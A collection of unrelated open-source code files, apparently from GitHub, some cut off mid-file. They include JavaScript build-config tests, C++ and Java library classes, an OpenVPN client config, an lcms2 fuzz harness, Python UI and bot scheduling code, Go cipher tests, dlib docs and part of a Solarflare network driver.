fis.match('**', {
release: 'static/$&'
}); // fis.config.match
fis.match('**/js.js', {
domain: 'www.baidu.com',
useHash: false
}, 1);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
//without domain
// useDomain 已经去除,所以应该不收其影响了
fis.match('**/js.js', {
useDomain: false
}, 2);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
fis.match('**/js.js', {
release: null
}, 3);
//without path
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ()
fis.match('**/v1.0-(*)/(*).html', {
release: '/$1/$2'
});
path = __dirname+'/file/ext/v1.0-layout/test.html?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/layout/test.html?__inline');
fis.match('!**/js.js', {
release: '/static/$&',
useHash: true,
domain: 'www.baidu.com'
});
//with !
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ! but not match
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js_'+ f.getHash() +'.less?__inline');
});
it('match ${}', function() {
fis.match('**/*.js', {
release: null,
useHash: false
})
fis.set('coffee', 'js');
fis.match('**/js.js', {
release: '/static/$&'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/j.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/file/ext/modular/j.js?__inline');
});
it('match 混合用法', function() {
fis.set('ROOT', 'js');
fis.match('**', {
useHash: false
});
fis.match('(**/${ROOT}.js)', {
release: '/static/js/$1'
});
fis.match('(**/${ROOT}.less)', {
release: '/static/js/$1'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.less?__inline');
});
it('del', function(){
fis.config.del();
var origin = fis.config.get();
fis.set('a.b', 'b');
fis.media('pro').set('a.b', 'b');
fis.config.del('a.b');
expect(fis.get('a')).to.deep.equal({});
expect(fis.media('pro').get('a.b')).to.equal('b');
fis.config.del('a');
expect(fis.get()).to.deep.equal(origin);
fis.media('pro').del('a');
expect(fis.media('pro').get()).to.deep.equal({});
});
it('getSortedMatches', function() {
fis.media('prod').match('a', {
name: ''
});
var matches = fis.media('prod')._matches.concat();
var initIndex = matches[matches.length - 1].index;
fis.match('b', {
name: ''
}, 1)
fis.match('c', {
name: ''
}, 2)
fis.media('prod').match('b', {
name: 'prod'
}, 1)
fis.media('prod').match('c', {
name: 'prod'
}, 2);
var result_gl = [
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 1,
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* ValueIterator.cpp
*
* Implementation of the value iterator
*
* @author Emiel Bruijntjes <emiel.bruijntjes@copernica.com>
* @copyright 2014 Copernica BV
*/
#include "includes.h"
/**
* Set up namespace
*/
namespace Php {
/**
* Constructor
* @param impl Implementation iterator
*/
ValueIterator::ValueIterator(ValueIteratorImpl *impl) : _impl(impl) {}
/**
* Copy constructor
* @param that
*/
ValueIterator::ValueIterator(const ValueIterator &that) : _impl(that._impl->clone()) {}
/**
* Destructor
*/
ValueIterator::~ValueIterator() = default;
/**
* Increment position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator++()
{
// increment implementation
_impl->increment();
// done
return *this;
}
/**
* Decrement position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator--()
{
// decrement implementation
_impl->decrement();
// done
return *this;
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator==(const ValueIterator &that) const
{
return _impl->equals(that._impl.get());
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator!=(const ValueIterator &that) const
{
return !_impl->equals(that._impl.get());
}
/**
* Derefecence, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> &ValueIterator::operator*() const
{
return _impl->current();
}
/**
* Dereference, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> *ValueIterator::operator->() const
{
return &_impl->current();
}
/**
* End namespace
*/
}
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.sun.org.apache.bcel.internal.classfile;
import java.io.DataInput;
import java.io.DataOutputStream;
import java.io.IOException;
import com.sun.org.apache.bcel.internal.Const;
/**
* This class is derived from the abstract {@link Constant}
* and represents a reference to a String object.
*
* @version $Id$
* @see Constant
*/
public final class ConstantString extends Constant implements ConstantObject {
private int string_index; // Identical to ConstantClass except for this name
/**
* Initialize from another object.
*/
public ConstantString(final ConstantString c) {
this(c.getStringIndex());
}
/**
* Initialize instance from file data.
*
* @param file Input stream
* @throws IOException
*/
ConstantString(final DataInput file) throws IOException {
this(file.readUnsignedShort());
}
/**
* @param string_index Index of Constant_Utf8 in constant pool
*/
public ConstantString(final int string_index) {
super(Const.CONSTANT_String);
this.string_index = string_index;
}
/**
* Called by objects that are traversing the nodes of the tree implicitely
* defined by the contents of a Java class. I.e., the hierarchy of methods,
* fields, attributes, etc. spawns a tree of objects.
*
* @param v Visitor object
*/
@Override
public void accept( final Visitor v ) {
v.visitConstantString(this);
}
/**
* Dump constant field reference to file stream in binary format.
*
* @param file Output file stream
* @throws IOException
*/
@Override
public final void dump( final DataOutputStream file ) throws IOException {
file.writeByte(super.getTag());
file.writeShort(string_index);
}
/**
* @return Index in constant pool of the string (ConstantUtf8).
*/
public final int getStringIndex() {
return string_index;
}
/**
* @param string_index the index into the constant of the string value
*/
public final void setStringIndex( final int string_index ) {
this.string_index = string_index;
}
/**
* @return String representation.
*/
@Override
public final String toString() {
return super.toString() + "(string_index = " + string_index + ")";
}
/** @return String object
*/
@Override
public Object getConstantValue( final ConstantPool cp ) {
final Constant c = cp.getConstant(string_index, Const.CONSTANT_Utf8);
return ((ConstantUtf8) c).getBytes();
}
/** @return dereferenced string
*/
public String getBytes( final ConstantPool cp ) {
return (String) getConstantValue(cp);
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
client
dev tun
proto tcp
remote sg.mullvad.net 80
cipher AES-256-CBC
resolv-retry infinite
nobind
persist-key
persist-tun
verb 3
remote-cert-tls server
ping 10
ping-restart 60
sndbuf 524288
rcvbuf 524288
auth-user-pass /config/openvpn-credentials.txt
ca /etc/openvpn/mullvad/ca.crt
tun-ipv6
script-security 2
tls-cipher TLS-DHE-RSA-WITH-AES-256-GCM-SHA384:TLS-DHE-RSA-WITH-AES-256-CBC-SHA
|
{
"pile_set_name": "Github"
}
| null | null |
// Copyright 2016 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
////////////////////////////////////////////////////////////////////////////////
#include <stdint.h>
#include "lcms2.h"
// The main sink
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
if (size == 0)
return 0;
cmsHANDLE handle = cmsIT8LoadFromMem(0, (void *)data, size);
if (handle)
cmsIT8Free(handle);
return 0;
}
|
{
"pile_set_name": "Github"
}
| null | null |
"""
Components for "My playlists" page.
"""
import urwid
from clay.gp import gp
from clay.songlist import SongListBox
from clay.notifications import notification_area
from clay.pages.page import AbstractPage
from clay.hotkeys import hotkey_manager
class MyPlaylistListItem(urwid.Columns):
"""
One playlist in the list of playlists.
"""
signals = ['activate']
def __init__(self, playlist):
self.playlist = playlist
self.text = urwid.SelectableIcon(u' \u2630 {} ({})'.format(
self.playlist.name,
len(self.playlist.tracks)
), cursor_position=3)
self.text.set_layout('left', 'clip', None)
self.content = urwid.AttrWrap(
self.text,
'default',
'selected'
)
super(MyPlaylistListItem, self).__init__([self.content])
def keypress(self, size, key):
"""
Handle keypress.
"""
return hotkey_manager.keypress("playlist_page", self, super(MyPlaylistListItem, self),
size, key)
def start_playlist(self):
"""
Start playing the selected playlist
"""
urwid.emit_signal(self, 'activate', self)
def get_tracks(self):
"""
Returns a list of :class:`clay.gp.Track` instances.
"""
return self.playlist.tracks
class MyPlaylistListBox(urwid.ListBox):
"""
List of playlists.
"""
signals = ['activate']
def __init__(self, app):
self.app = app
self.walker = urwid.SimpleListWalker([
urwid.Text('Not ready')
])
self.notification = None
gp.auth_state_changed += self.auth_state_changed
super(MyPlaylistListBox, self).__init__(self.walker)
def auth_state_changed(self, is_auth):
"""
Called when auth state changes (e. g. user is logged in).
Requests fetching of playlists.
"""
if is_auth:
self.walker[:] = [
urwid.Text(u'\n \uf01e Loading playlists...', align='center')
]
gp.get_all_user_playlist_contents_async(callback=self.on_get_playlists)
def on_get_playlists(self, playlists, error):
"""
Called when a list of playlists fetch completes.
Populates list of playlists.
"""
if error:
notification_area.notify('Failed to get playlists: {}'.format(str(error)))
items = []
for playlist in playlists:
myplaylistlistitem = MyPlaylistListItem(playlist)
urwid.connect_signal(
myplaylistlistitem, 'activate', self.item_activated
)
items.append(myplaylistlistitem)
self.walker[:] = items
self.app.redraw()
def item_activated(self, myplaylistlistitem):
"""
Called when a specific playlist is selected.
Re-emits this event.
"""
urwid.emit_signal(self, 'activate', myplaylistlistitem)
class MyPlaylistsPage(urwid.Columns, AbstractPage):
"""
Playlists page.
Contains two parts:
- List of playlists (:class:`.MyPlaylistListBox`)
- List of songs in selected playlist (:class:`clay:songlist:SongListBox`)
"""
@property
def name(self):
return 'Playlists'
@property
def key(self):
return 2
@property
def slug(self):
"""
Return page ID (str).
"""
return "playlists"
def __init__(self, app):
self.app = app
self.myplaylistlist = MyPlaylistListBox(app)
self.songlist = SongListBox(app)
self.songlist.set_placeholder('\n Select a playlist.')
urwid.connect_signal(
self.myplaylistlist, 'activate', self.myplaylistlistitem_activated
)
super(MyPlaylistsPage, self).__init__([
self.myplaylistlist,
self.songlist
])
def myplaylistlistitem_activated(self, myplaylistlistitem):
"""
Called when specific playlist is selected.
Populates songlist with tracks from the selected playlist.
"""
self.songlist.populate(
myplaylistlistitem.get_tracks()
)
def activate(self):
pass
|
{
"pile_set_name": "Github"
}
| null | null |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package tea
import (
"bytes"
"testing"
)
// A sample test key for when we just want to initialize a cipher
var testKey = []byte{0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF}
// Test that the block size for tea is correct
func TestBlocksize(t *testing.T) {
c, err := NewCipher(testKey)
if err != nil {
t.Fatalf("NewCipher returned error: %s", err)
}
if result := c.BlockSize(); result != BlockSize {
t.Errorf("cipher.BlockSize returned %d, but expected %d", result, BlockSize)
}
}
// Test that invalid key sizes return an error
func TestInvalidKeySize(t *testing.T) {
var key [KeySize + 1]byte
if _, err := NewCipher(key[:]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", len(key))
}
if _, err := NewCipher(key[:KeySize-1]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", KeySize-1)
}
}
// Test Vectors
type teaTest struct {
rounds int
key []byte
plaintext []byte
ciphertext []byte
}
var teaTests = []teaTest{
// These were sourced from https://github.com/froydnj/ironclad/blob/master/testing/test-vectors/tea.testvec
{
numRounds,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x41, 0xea, 0x3a, 0x0a, 0x94, 0xba, 0xa9, 0x40},
},
{
numRounds,
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0x31, 0x9b, 0xbe, 0xfb, 0x01, 0x6a, 0xbd, 0xb2},
},
{
16,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0xed, 0x28, 0x5d, 0xa1, 0x45, 0x5b, 0x33, 0xc1},
},
}
// Test encryption
func TestCipherEncrypt(t *testing.T) {
// Test encryption with standard 64 rounds
for i, test := range teaTests {
c, err := NewCipherWithRounds(test.key, test.rounds)
if err != nil {
t.Fatalf("#%d: NewCipher returned error: %s", i, err)
}
var ciphertext [BlockSize]byte
c.Encrypt(ciphertext[:], test.plaintext)
if !bytes.Equal(ciphertext[:], test.ciphertext) {
t.Errorf("#%d: incorrect ciphertext. Got %x, wanted %x", i, ciphertext, test.ciphertext)
}
var plaintext2 [BlockSize]byte
c.Decrypt(plaintext2[:], ciphertext[:])
if !bytes.Equal(plaintext2[:], test.plaintext) {
t.Errorf("#%d: incorrect plaintext. Got %x, wanted %x", i, plaintext2, test.plaintext)
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
// Copyright (C) 2013 Davis E. King (davis@dlib.net)
// License: Boost Software License See LICENSE.txt for the full license.
#undef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#ifdef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#include "thread_pool_extension_abstract.h"
#include "async_abstract.h"
namespace dlib
{
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This is a convenience function for submitting a block of jobs to a thread_pool.
In particular, given the half open range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call (obj.*funct)() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that (obj.*funct)(begin[i], end[i]) is invoked for all valid
values of i. Moreover, the subranges are non-overlapping and completely
cover the total range of [begin, end).
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- chunks_per_thread > 0
- begin <= end
ensures
- This is a convenience function for submitting a block of jobs to a
thread_pool. In particular, given the range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call funct() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that funct(begin[i], end[i]) is invoked for all valid values
of i.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
parallel_for_blocked(default_thread_pool(), begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
(obj.*funct)(i);
}, chunks_per_thread);
- Therefore, this routine invokes (obj.*funct)(i) for all i in the range
[begin, end). However, it does so using tp.num_threads_in_pool() parallel
threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
funct(i);
}, chunks_per_thread);
- Therefore, this routine invokes funct(i) for all i in the range [begin, end).
However, it does so using tp.num_threads_in_pool() parallel threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, funct, chunks_per
|
{
"pile_set_name": "Github"
}
| null | null |
import asyncio
import random
from typing import Optional, Callable
import aiojobs
import bili_statistics
from user.user import User
from tasks.base_class import TaskType, UniqueType, How2Call
from printer import info as print
class Users:
__slots__ = ('_users', '_global_task_control', '_global_task_arrangement', '_dict_bili', '_force_sleep')
def __init__(self,
global_task_control: dict, global_task_arrangement: dict,
dict_bili: dict, force_sleep: Callable):
self._users = []
self._global_task_control = global_task_control
self._global_task_arrangement = global_task_arrangement
self._dict_bili = dict_bili
self._force_sleep = force_sleep
@property
def superuser(self) -> User:
return self._users[0]
def gets_with_restrict(self, index: int, task):
task_name = task.TASK_NAME
for user in self.gets(index):
if user.is_in_jail and task_name in (
'recv_heart_gift',
'open_silver_box',
'join_storm_raffle',
'join_guard_raffle',
'join_tv_raffle',
'join_pk_raffle'
):
continue
if task_name != 'null': # null 就忽略过滤,直接参与
if f'probability_{task_name}' in user.task_arrangement: # 平均概率筛选
if not random.random() < user.task_arrangement[f'probability_{task_name}']:
continue
if not bili_statistics.add2max_time_task_checkers( # 每日次数筛选
user_id=user.id,
task=task,
max_time=user.task_arrangement.get(task_name, -1)):
continue
yield user
# async 只是为了 User 里面的 aiohttp 的 session;即使切了也没啥吧,append 的时候不切换协程,对 notifier 运行中不会造成什么影响
async def add_user(self, user_info: dict, custom_task_control: dict, custom_task_arrangement: dict):
task_control = {**self._global_task_control, **custom_task_control}
task_arrangement = {**self._global_task_arrangement, **custom_task_arrangement}
user = User(
dict_user=user_info,
task_ctrl=task_control,
task_arrangement=task_arrangement,
dict_bili=self._dict_bili,
force_sleep=self._force_sleep)
self._users.append(user)
def gets(self, index: int):
if index == -2:
for user in self._users:
yield user
return
user = self._users[index]
yield user
class Notifier:
__slots__ = ('_loop', '_users', '_scheduler',)
def __init__(self, loop=None):
if loop is None:
self._loop = asyncio.get_event_loop()
else:
self._loop = loop
self._users: Optional[Users] = None
self._scheduler: Optional[aiojobs.Scheduler] = None
def init(self, users: Users):
self._users = users
async def add_user(self, **kwargs):
await self._users.add_user(**kwargs)
# pause 和 resume 必须在同一个循环里面用,否则可能发生类似线程不安全的东西
async def resume(self):
if self._scheduler is None:
self._scheduler = await aiojobs.create_scheduler()
async def pause(self):
if self._scheduler is not None and not self._scheduler.closed:
scheduler = self._scheduler
self._scheduler = None
await scheduler.close()
@staticmethod
async def _unique_work(user: User, task, func: Callable, *args, **kwargs):
if bili_statistics.start_unique_task(user.id, task):
try:
result = await func(user, *args, **kwargs)
bili_statistics.done_unique_task(user.id, task)
return result
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
bili_statistics.cancel_unique_task(user.id, task)
else:
print(f'重复推送{func} {user.id}(此为debug信息忽略即可)')
return None
@staticmethod
async def _multi_work(user: User, _, func: Callable, *args, **kwargs):
try:
return await func(user, *args, **kwargs)
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
return None
async def run_sched_func(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
await scheduler.spawn(func(*args, **kwargs))
# 这里是为了日常任务的check问题
async def run_sched_func_with_return(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
return await func(*args, **kwargs)
def run_sched_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_sched_func(*args, **kwargs))
@staticmethod
async def run_forced_func(func: Callable, *args, **kwargs):
return await func(*args, **kwargs)
def run_forced_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_forced_func(*args, **kwargs))
async def _dont_wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
_):
for user_id, delay_range, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
delay = random.uniform(*delay_range)
self._loop.call_later(
delay, handle_work, handle_unique, user, task, func_work, *args)
async def _wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
await handle_work(handle_unique, user, task, func_work, *args)
return None
results = []
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
results.append(await handle_work(handle_unique, user, task, func_work, *args))
return results
async def _wait_and_pass(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
result =
|
{
"pile_set_name": "Github"
}
| null | null |
/* Firefox Quantum userChrome.css tweaks ************************************************/
/* Github: https://github.com/aris-t2/customcssforfx ************************************/
/****************************************************************************************/
@import "./addonlists_compact.css";
#addons-page .addon{
padding: 0 4px !important;
}
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.beam.sdk.options;
import com.google.auto.service.AutoService;
import org.apache.beam.sdk.annotations.Experimental;
import org.apache.beam.sdk.annotations.Experimental.Kind;
import org.apache.beam.vendor.guava.v26_0_jre.com.google.common.collect.ImmutableList;
/** Options that are used to control configuration of the remote environment. */
@Experimental(Kind.PORTABILITY)
@Hidden
public interface RemoteEnvironmentOptions extends PipelineOptions {
// The default should be null (no default), so that the environment can pick its suitable tmp
// directory when nothing is specified by the user
@Description("Local semi-persistent directory")
String getSemiPersistDir();
void setSemiPersistDir(String value);
/** Register the {@link RemoteEnvironmentOptions}. */
@AutoService(PipelineOptionsRegistrar.class)
class Options implements PipelineOptionsRegistrar {
@Override
public Iterable<Class<? extends PipelineOptions>> getPipelineOptions() {
return ImmutableList.of(RemoteEnvironmentOptions.class);
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
Alternative delimiters for [link definitions][link1] are allowed -- as of
Markdown 1.0.2, I think. Hence, [this link][link2] and [this link][link3] work
too.
[link1]: http://daringfireball.net/projects/markdown/syntax#link "link syntax"
[link2]: http://daringfireball.net/projects/markdown/syntax#link 'link syntax'
[link3]: http://daringfireball.net/projects/markdown/syntax#link (link syntax)
|
{
"pile_set_name": "Github"
}
| null | null |
/****************************************************************************
* Driver for Solarflare network controllers and boards
* Copyright 2005-2006 Fen Systems Ltd.
* Copyright 2005-2013 Solarflare Communications Inc.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation, incorporated herein by reference.
*/
#include <linux/socket.h>
#include <linux/in.h>
#include <linux/slab.h>
#include <linux/ip.h>
#include <linux/ipv6.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/prefetch.h>
#include <linux/moduleparam.h>
#include <linux/iommu.h>
#include <net/ip.h>
#include <net/checksum.h>
#include "net_driver.h"
#include "efx.h"
#include "filter.h"
#include "nic.h"
#include "selftest.h"
#include "workarounds.h"
/* Preferred number of descriptors to fill at once */
#define EFX_RX_PREFERRED_BATCH 8U
/* Number of RX buffers to recycle pages for. When creating the RX page recycle
* ring, this number is divided by the number of buffers per page to calculate
* the number of pages to store in the RX page recycle ring.
*/
#define EFX_RECYCLE_RING_SIZE_IOMMU 4096
#define EFX_RECYCLE_RING_SIZE_NOIOMMU (2 * EFX_RX_PREFERRED_BATCH)
/* Size of buffer allocated for skb header area. */
#define EFX_SKB_HEADERS 128u
/* This is the percentage fill level below which new RX descriptors
* will be added to the RX descriptor ring.
*/
static unsigned int rx_refill_threshold;
/* Each packet can consume up to ceil(max_frame_len / buffer_size) buffers */
#define EFX_RX_MAX_FRAGS DIV_ROUND_UP(EFX_MAX_FRAME_LEN(EFX_MAX_MTU), \
EFX_RX_USR_BUF_SIZE)
/*
* RX maximum head room required.
*
* This must be at least 1 to prevent overflow, plus one packet-worth
* to allow pipelined receives.
*/
#define EFX_RXD_HEAD_ROOM (1 + EFX_RX_MAX_FRAGS)
static inline u8 *efx_rx_buf_va(struct efx_rx_buffer *buf)
{
return page_address(buf->page) + buf->page_offset;
}
static inline u32 efx_rx_buf_hash(struct efx_nic *efx, const u8 *eh)
{
#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS)
return __le32_to_cpup((const __le32 *)(eh + efx->rx_packet_hash_offset));
#else
const u8 *data = eh + efx->rx_packet_hash_offset;
return (u32)data[0] |
(u32)data[1] << 8 |
(u32)data[2] << 16 |
(u32)data[3] << 24;
#endif
}
static inline struct efx_rx_buffer *
efx_rx_buf_next(struct efx_rx_queue *rx_queue, struct efx_rx_buffer *rx_buf)
{
if (unlikely(rx_buf == efx_rx_buffer(rx_queue, rx_queue->ptr_mask)))
return efx_rx_buffer(rx_queue, 0);
else
return rx_buf + 1;
}
static inline void efx_sync_rx_buffer(struct efx_nic *efx,
struct efx_rx_buffer *rx_buf,
unsigned int len)
{
dma_sync_single_for_cpu(&efx->pci_dev->dev, rx_buf->dma_addr, len,
DMA_FROM_DEVICE);
}
void efx_rx_config_page_split(struct efx_nic *efx)
{
efx->rx_page_buf_step = ALIGN(efx->rx_dma_len + efx->rx_ip_align,
EFX_RX_BUF_ALIGNMENT);
efx->rx_bufs_per_page = efx->rx_buffer_order ? 1 :
((PAGE_SIZE - sizeof(struct efx_rx_page_state)) /
efx->rx_page_buf_step);
efx->rx_buffer_truesize = (PAGE_SIZE << efx->rx_buffer_order) /
efx->rx_bufs_per_page;
efx->rx_pages_per_batch = DIV_ROUND_UP(EFX_RX_PREFERRED_BATCH,
efx->rx_bufs_per_page);
}
/* Check the RX page recycle ring for a page that can be reused. */
static struct page *efx_reuse_page(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
struct page *page;
struct efx_rx_page_state *state;
unsigned index;
index = rx_queue->page_remove & rx_queue->page_ptr_mask;
page = rx_queue->page_ring[index];
if (page == NULL)
return NULL;
